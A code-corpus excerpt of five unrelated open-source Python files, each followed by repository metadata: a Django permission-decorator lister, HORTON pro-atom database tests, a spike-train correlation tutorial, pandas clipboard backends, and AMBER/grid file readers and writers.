99fbb999751c90febb2cd8d1542b01277a3caddbe4e582f373c6af8d3d81b77d
|
import ast
import inspect
import os
if __name__ == '__main__':
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sapl.settings")
django.setup()
if True:
from scripts.lista_urls import lista_urls
def get_decorators(cls):
target = cls
decorators = {}
def visit_FunctionDef(node):
decorators[node.name] = []
for n in node.decorator_list:
name = ''
if isinstance(n, ast.Call):
name = n.func.attr if isinstance(
n.func, ast.Attribute) else n.func.id
else:
name = n.attr if isinstance(n, ast.Attribute) else n.id
decorators[node.name].append(name)
node_iter = ast.NodeVisitor()
node_iter.visit_FunctionDef = visit_FunctionDef
node_iter.visit(ast.parse(inspect.getsource(target)))
return decorators
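# Example with a made-up class:
#   class FooView:
#       @method_decorator(permission_required('app.perm'))
#       def dispatch(self, *args): ...
# get_decorators(FooView) -> {'dispatch': ['method_decorator']}; only the outermost name
# of each decorator expression is recorded.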
def get_permission_requireds(cls):
target = cls
decorators = []
def get_permission_required(arg):
for perm in arg.args:
if isinstance(perm, ast.Str):
decorators.append(getattr(perm, perm._fields[0]))
continue
if isinstance(perm, (ast.Tuple, ast.List)):
if 'elts' not in perm._fields:
continue
for elt in perm.elts:
if isinstance(elt, ast.Str):
decorators.append(getattr(elt, elt._fields[0]))
def get_method_decorator(n):
for arg in n.args:
if not isinstance(arg, ast.Call):
continue
"""
Espera-se que:
- o decorator seja uma função
- esta função tenha o meta atributo 'id'
- id = 'permission_required'
- esta função tenha argumento args
"""
if ('func' not in arg._fields or
'id' not in arg.func._fields or
arg.func.id != 'permission_required' or
'args' not in arg._fields):
continue
get_permission_required(arg)
def visit_FunctionDef(node):
for n in node.decorator_list:
if not isinstance(n, ast.Call):
continue
"""
Espera-se que:
- o decorator seja uma função
- esta função tenha o meta atributo 'id'
- id = 'method_decorator'
- esta função tenha argumento args
"""
if ('func' not in n._fields or
'id' not in n.func._fields or
n.func.id != 'method_decorator' or
'args' not in n._fields):
get_permission_required(n)
else:
get_method_decorator(n)
node_iter = ast.NodeVisitor()
node_iter.visit_FunctionDef = visit_FunctionDef
node_iter.visit(ast.parse(inspect.getsource(target)))
return decorators
class ListaPermissionInDecorators():
decorators = []
def lista_permissions_in_decorators(self):
urls = lista_urls()
for url_item in urls:
key, url, var, app_name = url_item
if hasattr(key, 'view_class'):
view = key.view_class
elif hasattr(key, 'cls'):
view = key.cls
else:
view = key
if not view.__module__.startswith('sapl.'):
continue
try:
decorators = list(map(lambda x: (x, view),
get_permission_requireds(view)
))
self.decorators += decorators
except:
pass
return self.decorators
def __call__(self):
return self.lista_permissions_in_decorators()
lista_permissions_in_decorators = ListaPermissionInDecorators()
if __name__ == '__main__':
_lista_permissions_in_decorators = lista_permissions_in_decorators()
print(_lista_permissions_in_decorators)
|
LeandroRoberto/sapl
|
scripts/lista_permissions_in_decorators.py
|
Python
|
gpl-3.0
| 4,034
|
[
"VisIt"
] |
d816c1457902b4b194fdce6be2ed001488b8c1ef635a67bb1cf7ce1be5197441
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2016 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
import numpy as np, h5py as h5
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
from horton.part.test.common import get_proatomdb_cp2k
from horton.test.common import tmpdir
def test_db_basics():
padb = ProAtomDB.from_refatoms(numbers=[8, 1], max_cation=1, max_anion=1)
assert padb.get_numbers() == [1, 8]
assert padb.get_charges(8) == [1, 0, -1]
assert padb.get_charges(1) == [0, -1]
r1 = padb.get_record(8, -1)
assert r1.number == 8
assert r1.charge == -1
assert abs(r1.energy - -72.587) < 1e-3
assert r1.ipot_energy == padb.get_record(8, 0).energy - r1.energy
assert r1.population == 9
assert r1.pseudo_number == 8
assert r1.pseudo_population == 9
assert r1.safe
assert r1.rgrid.size == 59
r2 = padb.get_record(8, -1)
r3 = padb.get_record(8, 0)
assert r1 == r2
assert r1 != r3
assert padb.get_rgrid(8) is r1.rgrid
assert padb.get_record(8, +1).ipot_energy is None
assert padb.get_record(8, -1).ipot_energy == padb.get_record(8, 0).energy - padb.get_record(8, -1).energy
assert padb.get_record(1, 0).ipot_energy == -padb.get_record(1, 0).energy
def test_db_basics_pseudo():
padb = get_proatomdb_cp2k()
assert padb.get_numbers() == [8, 14]
assert padb.get_charges(8) == [2, 1, 0, -1, -2]
assert padb.get_charges(8, safe=True) == [2, 1, 0, -1]
assert padb.get_charges(14) == [0]
assert not padb.get_record(8, -2).safe
assert padb.get_rgrid(8) is padb.get_record(8, -2).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, -1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 0).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 2).rgrid
r1 = padb.get_record(8, -1)
assert r1.safe
assert abs(r1.energy - -15.866511882272) < 1e-8
assert abs(r1.ipot_energy - (padb.get_record(8, 0).energy - r1.energy)) < 1e-5
r2 = padb.get_record(8, -2)
assert not r2.safe
assert abs(r2.energy - -15.464982778766) < 1e-8
assert abs(r2.ipot_energy - (r1.energy - r2.energy)) < 1e-5
assert padb.get_record(8, +2).ipot_energy is None
def test_record_basics_pseudo():
fn_out = context.get_fn('test/atom_si.cp2k.out')
mol = IOData.from_file(fn_out)
r = ProAtomRecord.from_iodata(mol)
assert r.number == 14
assert r.charge == 0
assert abs(r.energy - -3.761587698067) < 1e-10
assert r.ipot_energy is None
assert r.population == 14
assert r.pseudo_number == 4
assert r.pseudo_population == 4
assert r.safe
def compare_padbs(padb1, padb2):
assert padb1.size == padb2.size
for number in padb1.get_numbers():
for charge in padb1.get_charges(number):
r1 = padb1.get_record(number, charge)
r2 = padb2.get_record(number, charge)
assert r1 == r2
def test_io_group():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
assert padb1.size == 5
keys = sorted(padb1._map.keys())
assert keys == [(1, -1), (1, 0), (6, -1), (6, 0), (6, +1)]
with h5.File('horton.dpart.test.test_proatomdb.test_io_group', driver='core', backing_store=False) as f:
padb1.to_file(f)
padb2 = ProAtomDB.from_file(f)
compare_padbs(padb1, padb2)
def test_io_filename():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=0)
keys = sorted(padb1._map.keys())
assert keys == [(1, 0), (6, 0), (6, 1)]
with tmpdir('horton.dpart.test.test_proatomdb.test_io_filename') as dn:
filename = '%s/test.h5' % dn
padb1.to_file(filename)
padb2 = ProAtomDB.from_file(filename)
compare_padbs(padb1, padb2)
def test_compute_radii():
rgrid = RadialGrid(ExpRTransform(1e-3, 1e1, 100))
padb = ProAtomDB.from_refatoms([1, 6], 0, 0, (rgrid, 110))
record = padb.get_record(6, 0)
indexes, radii = record.compute_radii([2.0, 5.9, 5.999])
assert (indexes == [69, 90, 100]).all()
assert abs(radii - np.array([0.600577, 4.168655, 10.0])).max() < 1e-5
def test_moments():
padb = get_proatomdb_cp2k()
record0 = padb.get_record(8, 0)
record1 = padb.get_record(8, 1)
m0 = record0.get_moment(3)
m1 = record1.get_moment(3)
assert m0 > m1
assert abs(m0-21.84) < 1e-2
assert abs(m1-12.17) < 1e-2
def check_spline_record(spline, record):
assert abs(spline.y - record.rho).max() < 1e-10
assert abs(spline.dx - record.deriv).max() < 1e-10
def check_spline_pop(spline, pop):
rtf = spline.rtransform
int1d = spline.rtransform.get_default_int1d()
check_pop = 4*np.pi*dot_multi(
rtf.get_deriv(),
rtf.get_radii()**2,
spline.y,
int1d.get_weights(rtf.npoint),
)
assert abs(pop - check_pop) < 1e-2
def check_spline_mono_decr(spline):
t = np.arange(0, spline.rtransform.npoint, 0.1)
x = spline.rtransform.radius(t)
y = spline(x)
i = (abs(y) < 1e-10).nonzero()[0][0]
y = y[:i]
assert ((y[1:] - y[:-1])/y[:-1]).min() < 1e-9
def test_get_spline():
padb = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
spline = padb.get_spline(6)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(6, 0))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(6, -1))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
check_spline_mono_decr(spline)
spline = padb.get_spline(1, {0:0.5})
check_spline_pop(spline, 0.5)
check_spline_mono_decr(spline)
def test_get_spline_pseudo():
padb = get_proatomdb_cp2k()
spline = padb.get_spline(8)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(8, 0))
spline = padb.get_spline(8, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(8, -1))
spline = padb.get_spline(8, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
spline = padb.get_spline(14)
check_spline_pop(spline, 4.0)
check_spline_record(spline, padb.get_record(14, 0))
def test_compact():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
assert padb.get_rgrid(8).size < 100
assert padb.get_rgrid(14).size < 100
def test_normalize():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
padb.normalize()
for number in padb.get_numbers():
rgrid = padb.get_rgrid(number)
for charge in padb.get_charges(number):
r = padb.get_record(number, charge)
nel = rgrid.integrate(r.rho)
nel_integer = r.pseudo_number - charge
assert abs(nel - nel_integer) < 1e-10
def test_empty_proatom():
padb = get_proatomdb_cp2k()
assert (padb.get_rho(8, {}) == 0.0).all()
def test_io_atdens():
padb = ProAtomDB.from_file(context.get_fn('test/pro.atdens'))
assert padb.get_numbers() == [16]
assert padb.get_charges(16) == [3, 2]
r = padb.get_record(16, 3)
assert abs(r.rho[0] - 0.2628105459E+04) < 1e-5
assert abs(r.rho[-1] - 0.1998952826E-16) < 1e-5
s = padb.get_spline(16, 3)
assert abs(s(np.array([0.0])) - 2661.68659449) < 1e-5
radii = r.rgrid.rtransform.get_radii()
assert radii[0] == 0.5216488380E-03
assert abs(radii[-1] - 20) < 1e-14
assert abs(radii[1] - 0.5442350204E-03) < 1e-8
assert abs(r.rgrid.integrate(r.rho) - 13) < 1e-3
# check the basics of the get_rho method (charge)
rho1 = padb.get_rho(16, 3)
rho2, deriv = padb.get_rho(16, 3, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
# check the basics of the get_rho method (dict)
rho1 = padb.get_rho(16, {3:1})
rho2, deriv = padb.get_rho(16, {3:1}, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
|
crisely09/horton
|
horton/part/test/test_proatomdb.py
|
Python
|
gpl-3.0
| 8,738
|
[
"CP2K"
] |
777e0a54f81ccbc99bd034740e2b769df920e751ff01c3e969d8aae788efebbd
|
import numpy as np
import pylab as pl
'''
This script contains all the functions you will use for the assignments.
Have a look at them and don't be afraid to ask if you have questions about the code here!
'''
'''
Function to compute the correlation coefficient given a certain time-window [time_window in ms]
Note that the spiketrains are given as vectors containing the firing times of each neuron.
Recording time T in seconds!
'''
def corr_coeff(spktr1, spktr2, time_window,T):
dt = 0.1 # time resolution [ms]
t = np.arange(0,1000*T+dt,dt)
# time window is implemented as a boxkernel of length time_window/dt
boxkernel = np.ones(int(np.ceil(time_window/dt)))
# create arrays that contain 1s for spiketimes, and 0s otherwise
hist1 = np.zeros(len(t))
hist1[(spktr1*1000/dt).astype(int)]=1
hist2 = np.zeros(len(t))
hist2[(spktr2*1000/dt).astype(int)]=1
# convolution with the boxkernel is an efficient way to count the events in the
# interval time_window
n1 = np.convolve(hist1,boxkernel,'same')
n2 = np.convolve(hist2,boxkernel,'same')
# use a built-in numpy function to compute the correlation coefficient between the
# count sequences:
rho = np.corrcoef(n1,n2)[0,1]
return rho
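# A minimal usage sketch (illustrative values; poisson_generator is
# defined further below in this module):
#   T = 10.                                  # recording time [s]
#   spktr1 = poisson_generator(50., T)       # two independent 50 Hz trains
#   spktr2 = poisson_generator(50., T)
#   rho = corr_coeff(spktr1, spktr2, 5., T)  # 5 ms window; rho should be ~0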
# cross-covariance function
def cross_cov(spktr1, spktr2,T,plot=True):
# reverse the order if spktr2 is longer, such that we always loop over the shorter
# array later. This speeds up the code.
if len(spktr1)>len(spktr2):
spktr1,spktr2 = spktr2, spktr1
reverse = True # set a flag, so we can later switch back to the original order
else:
reverse = False
Delta_t = np.array([])
# collect all the timedifferences
for k in range(len(spktr1)):
Delta_t = np.append(Delta_t, spktr2-spktr1[k])
if reverse:
Delta_t=-Delta_t
meanrate_1 = len(spktr1)/T
meanrate_2 = len(spktr2)/T
dt = 0.001 #[s]
t = np.arange(-T,T+dt,dt)
# bin the time differences
crosscov = np.histogram(Delta_t, len(t),(-T,T))[0]/(dt*T)
# subtract mean rates, the last term is to cancel boundary effects
crosscov = crosscov-meanrate_1*meanrate_2*(T-np.abs(t))/T
if plot:
pl.figure()
pl.plot(t,crosscov)
pl.title('Cross covariance function')
pl.xlabel('$\Delta$t [s]')
pl.xlim([-1,1])
pl.ylabel('C($\Delta$t)')
pl.grid(True)
pl.show()
return t, crosscov
'''
This function generates a Poissonian spiketrain. It takes as inputs
the mean rate and the recording interval T.
The code draws the total number of events from a Poisson distribution
and places them uniformly at random on [0, T]; this is statistically
equivalent to accumulating exponentially distributed inter-event
intervals, the defining property of a Poisson process.
'''
def poisson_generator(rate,T):
try:
N_events = np.random.poisson(rate*T)
except (ValueError, TypeError):
raise Exception('rate has to be a nonnegative number!')
return T*np.sort(np.random.rand(N_events))
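# For reference, the equivalent inter-spike-interval construction
# (a sketch only, not used elsewhere in this module):
#   def poisson_generator_isi(rate, T):
#       times = []
#       t = np.random.exponential(1. / rate)  # exponential ISIs <=> Poisson
#       while t < T:
#           times.append(t)
#           t += np.random.exponential(1. / rate)
#       return np.array(times)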
'''
Plots the spiketrains. Takes as input a tuple containing the spiketrains, so
don't forget the extra brackets.
'''
def spiketrainplot(spiketrains, interval = [0,50]):
n = len(spiketrains)
pl.figure(figsize=(10,n+1.))
for i,add_sp in enumerate(spiketrains):
pl.plot(add_sp,-(i+1)*np.ones(len(add_sp)),'|',markersize=50.)
pl.ylim([-n-0.5,-0.5])
yticklabels=['Spiketrain 1']
for i in range(2,n+1):
yticklabels=np.append('Spiketrain '+str(i),yticklabels)
pl.subplots_adjust(left=0.15, right=0.95, top=1-0.3/(n+1.), bottom=0.7/(n+1.))
pl.yticks(range(-n,0),yticklabels)
pl.xlabel('Time [s]')
pl.xlim(interval)
'''
A simple implementation of a leaky integrate-and-fire-neuron. The
input arguments are the input-spiketrain, the recording time T, and
as optional arguments an input signal and the synaptic weight Jsyn.
The output is again an array of firing-times.
'''
def simple_neuron(spktr,T,signal=0,Jsyn=5.):
v_0 = -60 # resting potential
v_thr = -40 # threshold potential
tau = 25. #membrane time constant [ms]
v = v_0 # initial membrane potential
dt = 0.1 # timestep of the integration [ms]
time = np.arange(dt/1000.,T+dt/1000.,dt/1000.)
# make sure the input firingtimes are in chronological order:
spktr=np.append(np.sort(spktr),T+dt/1000)
output=np.array([]) # initialize output firingtimes
count=0 # variable to count input spikes
for t in time:
v=v+dt/tau*(-(v-v_0)+signal) # forward Euler
if t>spktr[count]: # input spike condition
v+=Jsyn
count+=1
# if threshold is reached, reset to resting potential
# and record output firing time
if v>v_thr:
v=v_0
output=np.append(output,t)
return output
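# A quick usage sketch (illustrative values): drive the neuron with a
# 100 Hz Poisson input for one second and read off the output rate.
#   T = 1.
#   spk_out = simple_neuron(poisson_generator(100., T), T)
#   rate_out = len(spk_out) / T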
'''
The following function simulates two neurons during the presentation of
a grating with orientation defined by the variable stimulus (angle is given
in radians, not degrees!).
phi_pref1 and phi_pref2 are the preferred orientations of the two neurons.
c specifies the noise correlations in the input to the two neurons.
The number of trials is set to 50 by default.
The function returns a 2 x n_bootstrap array of bootstrapped mean rates,
with one row per neuron.
'''
def orientation_tuning(phi_pref1, phi_pref2, stimulus, c, n_trials=50):
amplitude = 5.
signal1 = amplitude*np.exp(-np.sin(phi_pref1-stimulus)**2) # compute stimulus-dependent
signal2 = amplitude*np.exp(-np.sin(phi_pref2-stimulus)**2) # input signals
outputrate=np.zeros((2,n_trials))
T=1. # trial duration
rate = 100. # rate of background input
for i in range(n_trials):
# create correlated background input
s1 = poisson_generator(rate*(1-c),T)
s2 = poisson_generator(rate*(1-c),T)
sc = poisson_generator(rate*c,T)
sp1 = np.append(s1,sc)
sp2 = np.append(s2,sc)
# compute output of the neurons
neuron1 = simple_neuron(sp1,T,signal1)
neuron2 = simple_neuron(sp2,T,signal2)
outputrate[0,i] = len(neuron1)/T
outputrate[1,i] = len(neuron2)/T
# bootstrapping
n_bootstrap = 500
outputrate_bootstrapped=np.zeros((2,n_bootstrap))
idx = np.random.randint(n_trials,size=(int(n_trials/5),n_bootstrap))
outputrate_bootstrapped[0,:]=np.mean(np.take(outputrate[0,:],idx),0)
outputrate_bootstrapped[1,:]=np.mean(np.take(outputrate[1,:],idx),0)
#outputrate_bootstrapped[1,:]=np.mean(np.random.choice(outputrate[1,:],(int(n_trials/5),n_bootstrap)),0)
return outputrate_bootstrapped
|
h-mayorquin/camp_india_2016
|
tutorials/Network Correlations/network_correlations.py
|
Python
|
mit
| 6,684
|
[
"NEURON"
] |
13f9cb6ff6ba511bb285fd8da432ed10ca65c7dad5e95f8976c7656f0e52a867
|
import subprocess
from .exceptions import PyperclipException
from pandas.compat import PY2, text_type
EXCEPT_MSG = """
Pyperclip could not find a copy/paste mechanism for your system.
For more information, please visit https://pyperclip.readthedocs.org """
def init_osx_clipboard():
def copy_osx(text):
p = subprocess.Popen(['pbcopy', 'w'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_osx():
p = subprocess.Popen(['pbpaste', 'r'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_osx, paste_osx
def init_gtk_clipboard():
import gtk
def copy_gtk(text):
global cb
cb = gtk.Clipboard()
cb.set_text(text)
cb.store()
def paste_gtk():
clipboardContents = gtk.Clipboard().wait_for_text()
# for python 2, returns None if the clipboard is blank.
if clipboardContents is None:
return ''
else:
return clipboardContents
return copy_gtk, paste_gtk
def init_qt_clipboard():
# $DISPLAY should exist
# Try to import from qtpy, but if that fails try PyQt5 then PyQt4
try:
from qtpy.QtWidgets import QApplication
except ImportError:
try:
from PyQt5.QtWidgets import QApplication
except ImportError:
from PyQt4.QtGui import QApplication
app = QApplication.instance()
if app is None:
app = QApplication([])
def copy_qt(text):
cb = app.clipboard()
cb.setText(text)
def paste_qt():
cb = app.clipboard()
return text_type(cb.text())
return copy_qt, paste_qt
def init_xclip_clipboard():
def copy_xclip(text):
p = subprocess.Popen(['xclip', '-selection', 'c'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_xclip():
p = subprocess.Popen(['xclip', '-selection', 'c', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_xclip, paste_xclip
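# A minimal usage sketch (assumes the xclip binary is installed; hypothetical):
#   copy_fn, paste_fn = init_xclip_clipboard()
#   copy_fn(u'hello')
#   assert paste_fn() == u'hello'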
def init_xsel_clipboard():
def copy_xsel(text):
p = subprocess.Popen(['xsel', '-b', '-i'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_xsel():
p = subprocess.Popen(['xsel', '-b', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_xsel, paste_xsel
def init_klipper_clipboard():
def copy_klipper(text):
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'setClipboardContents',
text.encode('utf-8')],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=None)
def paste_klipper():
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'getClipboardContents'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
# Workaround for https://bugs.kde.org/show_bug.cgi?id=342874
# TODO: https://github.com/asweigart/pyperclip/issues/43
clipboardContents = stdout.decode('utf-8')
# even if blank, Klipper will append a newline at the end
assert len(clipboardContents) > 0
# make sure that newline is there
assert clipboardContents.endswith('\n')
if clipboardContents.endswith('\n'):
clipboardContents = clipboardContents[:-1]
return clipboardContents
return copy_klipper, paste_klipper
def init_no_clipboard():
class ClipboardUnavailable(object):
def __call__(self, *args, **kwargs):
raise PyperclipException(EXCEPT_MSG)
if PY2:
def __nonzero__(self):
return False
else:
def __bool__(self):
return False
return ClipboardUnavailable(), ClipboardUnavailable()
|
louispotok/pandas
|
pandas/io/clipboard/clipboards.py
|
Python
|
bsd-3-clause
| 4,244
|
[
"VisIt"
] |
3699ea4cc3934d7d506bae8190fbaa093df8a0efffc5e3f775a5065ac453d804
|
import os
import numpy as np
import cPickle as pickle
import gzip
def load_pkl_gz(FN):
if os.path.isfile(FN) and os.path.getsize(FN) > 0:
F = gzip.open(FN, 'r')
try:
data = pickle.load(F)
except Exception:
print(' error loading ' + FN)
F.close()
return None
F.close()
return data
else:
return None
def write_pkl_gz(FN, data):
F = gzip.open(FN, 'w')
pickle.dump(data, F)
F.close()
return (" wrote to " + os.path.basename(FN))
class Grid:
"""
Class to read and write alchemical grids.
Data is a dictionary with
spacing - the grid spacing, in Angstroms.
counts - the number of points in each dimension.
vals - the values.
All are numpy arrays.
"""
def __init__(self):
pass
def read(self, FN, multiplier=None):
"""
Reads a grid in dx or netcdf format
The multiplier affects the origin and spacing.
"""
if FN is None:
raise Exception('File is not defined')
elif FN.endswith('.dx') or FN.endswith('.dx.gz'):
data = self._read_dx(FN)
elif FN.endswith('.nc'):
data = self._read_nc(FN)
else:
raise Exception('File type not supported')
if multiplier is not None:
data['origin'] = multiplier * data['origin']
data['spacing'] = multiplier * data['spacing']
return data
def _read_dx(self, FN):
"""
Reads a grid in dx format
"""
if FN.endswith('.dx'):
F = open(FN, 'r')
else:
import gzip
F = gzip.open(FN, 'r')
# Read the header
line = F.readline()
while line.find('object') == -1:
line = F.readline()
header = {}
header['counts'] = [int(x) for x in line.split(' ')[-3:]]
for name in ['origin', 'd0', 'd1', 'd2']:
header[name] = [float(x) for x in F.readline().split(' ')[-3:]]
F.readline()
header['npts'] = int(F.readline().split(' ')[-3])
# Test to make sure the grid type is okay.
# These conditions are not absolutely essential,
# but they reduce the number of subtraction operations.
if not (header['d0'][1] == 0 and header['d0'][2] == 0
and header['d1'][0] == 0 and header['d1'][2] == 0
and header['d2'][0] == 0 and header['d2'][1] == 0):
raise Exception('Trilinear grid must be in original basis')
if not (header['d0'][0] > 0 and header['d1'][1] > 0
and header['d2'][2] > 0):
raise Exception('Trilinear grid must have positive coordinates')
# Read the data
vals = np.ndarray(shape=header['npts'], dtype=float)
index = 0
while index < header['npts']:
line = F.readline()[:-1]
items = [float(item) for item in line.split()]
vals[index:index + len(items)] = items
index = index + len(items)
F.close()
data = {
'origin':np.array(header['origin']), \
'spacing':np.array([header['d0'][0],header['d1'][1],header['d2'][2]]), \
'counts':np.array(header['counts']), \
'vals':vals}
return data
def _read_nc(self, FN):
"""
Reads a grid in netcdf format
"""
from netCDF4 import Dataset
grid_nc = Dataset(FN, 'r')
data = {}
for key in list(grid_nc.variables):
data[key] = np.array(grid_nc.variables[key][:][0][:])
grid_nc.close()
return data
def write(self, FN, data, multiplier=None):
"""
Writes a grid in dx or netcdf format.
The multiplier affects the origin and spacing.
"""
if multiplier is not None:
data_n = {
'origin': multiplier * data['origin'],
'counts': data['counts'],
'spacing': multiplier * data['spacing'],
'vals': data['vals']
}
else:
data_n = data
if FN.endswith('.nc'):
self._write_nc(FN, data_n)
elif FN.endswith('.dx') or FN.endswith('.dx.gz'):
self._write_dx(FN, data_n)
else:
raise Exception('File type not supported')
def _write_dx(self, FN, data):
"""
Writes a grid in dx format
"""
n_points = data['counts'][0] * data['counts'][1] * data['counts'][2]
if FN.endswith('.dx'):
F = open(FN, 'w')
else:
import gzip
F = gzip.open(FN, 'w')
F.write("""object 1 class gridpositions counts {0[0]} {0[1]} {0[2]}
origin {1[0]} {1[1]} {1[2]}
delta {2[0]} 0.0 0.0
delta 0.0 {2[1]} 0.0
delta 0.0 0.0 {2[2]}
object 2 class gridconnections counts {0[0]} {0[1]} {0[2]}
object 3 class array type double rank 0 items {3} data follows
""".format(data['counts'], data['origin'], data['spacing'], n_points))
for start_n in range(0, len(data['vals']), 3):
F.write(' '.join(['%6e' % c
for c in data['vals'][start_n:start_n + 3]]) + '\n')
F.write('object 4 class field\n')
F.write('component "positions" value 1\n')
F.write('component "connections" value 2\n')
F.write('component "data" value 3\n')
F.close()
def _write_nc(self, FN, data):
"""
Writes a grid in netcdf format
"""
n_points = data['counts'][0] * data['counts'][1] * data['counts'][2]
from netCDF4 import Dataset
grid_nc = Dataset(FN, 'w', format='NETCDF4')
grid_nc.createDimension('one', 1)
grid_nc.createDimension('n_cartesian', 3)
grid_nc.createDimension('n_points', n_points)
grid_nc.createVariable('origin', 'f8', ('one', 'n_cartesian'))
grid_nc.createVariable('counts', 'i8', ('one', 'n_cartesian'))
grid_nc.createVariable('spacing', 'f8', ('one', 'n_cartesian'))
grid_nc.createVariable('vals', 'f8', ('one', 'n_points'), zlib=True)
for key in data.keys():
grid_nc.variables[key][:] = data[key]
grid_nc.close()
def truncate(self, in_FN, out_FN, counts, multiplier=None):
"""
Truncates the grid at the origin and
with a limited number of counts per dimension
multiplier is for the values, not the grid scaling
"""
data_o = self.read(in_FN)
nyz_o = data_o['counts'][1] * data_o['counts'][2]
nz_o = data_o['counts'][2]
min_i = int(-data_o['origin'][0] / data_o['spacing'][0])
min_j = int(-data_o['origin'][1] / data_o['spacing'][1])
min_k = int(-data_o['origin'][2] / data_o['spacing'][2])
# vals = np.ndarray(shape=tuple(counts), dtype=float)
# for i in range(counts[0]):
# for j in range(counts[1]):
# for k in range(counts[2]):
# vals[i,j,k] = data_o['vals'][(i+min_i)*nyz_o + (j+min_j)*nz_o + (k+min_k)]
vals = np.array([[[
data_o['vals'][(i + min_i) * nyz_o + (j + min_j) * nz_o + (k + min_k)]
for k in range(counts[2])
] for j in range(counts[1])] for i in range(counts[0])])
if multiplier is not None:
vals = vals * multiplier
data_n = {'origin':np.array([0., 0., 0.]), \
'counts':counts, 'spacing':data_o['spacing'], 'vals':vals.flatten()}
self.write(out_FN, data_n)
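# Example round trip (hypothetical file names; a sketch, not part of the
# original API):
#   grid = Grid()
#   data = grid.read('grid.nc')  # dict with 'origin', 'spacing', 'counts', 'vals'
#   grid.write('grid.dx.gz', data, multiplier=10.0)  # e.g. nm -> Angstroms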
class crd:
"""
Class to read and write AMBER coordinate/restart and trajectory files.
"""
def __init__(self):
pass
def read(self, FN, natoms=None, return_title=False, \
multiplier=None, trajectory=False):
"""
Reads an AMBER coordinate/restart or trajectory file.
If natoms is not none, then the coordinates will be split
into a list of natoms X 3 arrays.
The coordinates will be multiplied by multiplier.
"""
if not os.path.isfile(FN):
raise Exception('Coordinate file %s does not exist!' % FN)
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'r')
else:
F = open(FN, 'r')
dat = F.read().strip().split('\n')
F.close()
title = dat.pop(0) # Title
if len(dat[0].split()) > 1:
# VMD format (does not specify number of atoms)
crd = []
for line in dat:
crd = crd + [float(x) for x in line.split()]
crd = np.resize(crd, (len(crd) / 3, 3))
else:
# AMBER format
file_natoms = int(dat.pop(0)) # Number of atoms
if (natoms is not None) and (file_natoms != natoms):
print "Incorrect number of atoms in crd file"
return np.array([])
if trajectory:
w = 8 # For mdcrd
else:
w = 12 # For inpcrd
crd = []
for line in dat:
crd = crd + [float(line[x:x + w]) for x in range(0, len(line), w)]
crd = np.resize(crd, (len(crd) / 3, 3))
if multiplier is not None:
crd = multiplier * crd
if (natoms is not None):
crd = np.vsplit(crd, crd.shape[0] / natoms)
print " read %d configurations from %s" % (len(crd), FN)
if return_title:
return (crd, title)
else:
return crd
def write(self, FN, crd, title='', append=False, \
multiplier=None, trajectory=False):
"""
Writes an AMBER coordinate/restart or trajectory file
"""
if (append and os.path.isfile(FN)):
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'a')
else:
F = open(FN, 'a')
else:
if os.path.isfile(FN):
os.rename(FN, FN + '.BAK')
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'w')
else:
F = open(FN, 'w')
# Write the header
F.write(title + '\n') # Title
if not trajectory:
F.write('%d\n' % crd.shape[0])
if not trajectory:
flattened = np.vstack(crd).flatten()
if multiplier is not None:
flattened = multiplier * flattened
for n in range(0, len(flattened), 6):
F.write(''.join(['%12.7f' % val for val in flattened[n:n + 6]]) + '\n')
else:
for c in crd:
flattened = c.flatten()
if multiplier is not None:
flattened = multiplier * flattened
for n in range(0, len(flattened), 10):
F.write(''.join(['%8.3f' % val
for val in flattened[n:n + 10]]) + '\n')
F.close()
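# Example usage (hypothetical file names and atom count; a sketch only):
#   io_crd = crd()
#   confs = io_crd.read('ligand.inpcrd', natoms=25, multiplier=0.1)  # Angstrom -> nm
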